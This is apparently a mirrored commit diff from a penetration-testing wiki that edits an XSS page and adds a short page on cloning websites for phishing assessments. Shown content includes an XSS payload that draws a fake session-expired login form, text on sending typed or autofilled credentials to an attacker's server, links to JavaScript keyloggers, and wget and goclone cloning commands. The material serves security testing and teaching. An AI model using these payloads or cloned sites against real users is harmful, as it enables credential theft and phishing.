mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
GitBook: [master] 474 pages modified
This commit is contained in:
parent
e765a981c7
commit
87e89bb1a2
3 changed files with 42 additions and 3 deletions
|
@ -1,13 +1,14 @@
|
||||||
# Table of contents
|
# Table of contents
|
||||||
|
|
||||||
* [HackTricks](README.md)
|
* [HackTricks](README.md)
|
||||||
|
* [About the author](about-the-author.md)
|
||||||
* [Getting Started in Hacking](getting-started-in-hacking.md)
|
* [Getting Started in Hacking](getting-started-in-hacking.md)
|
||||||
* [Pentesting Methodology](pentesting-methodology.md)
|
* [Pentesting Methodology](pentesting-methodology.md)
|
||||||
* [External Recon Methodology](external-recon-methodology.md)
|
* [External Recon Methodology](external-recon-methodology.md)
|
||||||
* [Phishing Methodology](phishing-methodology/README.md)
|
* [Phishing Methodology](phishing-methodology/README.md)
|
||||||
|
* [Clone a Website](phishing-methodology/clone-a-website.md)
|
||||||
* [Detecting Phising](phishing-methodology/detecting-phising.md)
|
* [Detecting Phising](phishing-methodology/detecting-phising.md)
|
||||||
* [Phishing Documents](phishing-methodology/phishing-documents.md)
|
* [Phishing Documents](phishing-methodology/phishing-documents.md)
|
||||||
* [About the author](about-the-author.md)
|
|
||||||
* [Exfiltration](exfiltration.md)
|
* [Exfiltration](exfiltration.md)
|
||||||
* [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md)
|
* [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md)
|
||||||
* [Brute Force - CheatSheet](brute-force.md)
|
* [Brute Force - CheatSheet](brute-force.md)
|
||||||
|
|
|
@ -651,9 +651,11 @@ for(var i=0; i<ports.length; i++) {
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
_Short times indicate a responding port_ _Longer times indicate no response_
|
_Short times indicate a responding port_ _Longer times indicate no response._
|
||||||
|
|
||||||
### Box to as for credentials
|
Review the list of ports banned in Chrome [**here**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) and in Firefox [**here**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
|
||||||
|
|
||||||
|
### Box to ask for credentials
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
|
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
|
||||||
|
@ -674,6 +676,15 @@ body:username.value+':'+this.value
|
||||||
|
|
||||||
When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.
|
When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.
|
||||||
|
|
||||||
|
### Keylogger
|
||||||
|
|
||||||
|
Just searching in github I found a few different ones:
|
||||||
|
|
||||||
|
* [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
|
||||||
|
* [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
|
||||||
|
* [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
|
||||||
|
* You can also use metasploit `http_javascript_keylogger`
|
||||||
|
|
||||||
### XSS - Stealing CSRF tokens
|
### XSS - Stealing CSRF tokens
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
|
27
phishing-methodology/clone-a-website.md
Normal file
27
phishing-methodology/clone-a-website.md
Normal file
|
@ -0,0 +1,27 @@
|
||||||
|
# Clone a Website
|
||||||
|
|
||||||
|
For a phishing assessment sometimes it might be useful to completely **clone a website**.
|
||||||
|
|
||||||
|
Note that you can add also some payloads to the cloned website like a BeEF hook to "control" the tab of the user.
|
||||||
|
|
||||||
|
There are different tools you can use for this purpose:
|
||||||
|
|
||||||
|
### wget
|
||||||
|
|
||||||
|
```text
|
||||||
|
wget -mk -nH
|
||||||
|
```
|
||||||
|
|
||||||
|
### goclone
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#https://github.com/imthaghost/goclone
|
||||||
|
oclone <url>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Social Engineering Toolit
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#https://github.com/trustedsec/social-engineer-toolkit
|
||||||
|
```
|
||||||
|
|
Loading…
Reference in a new issue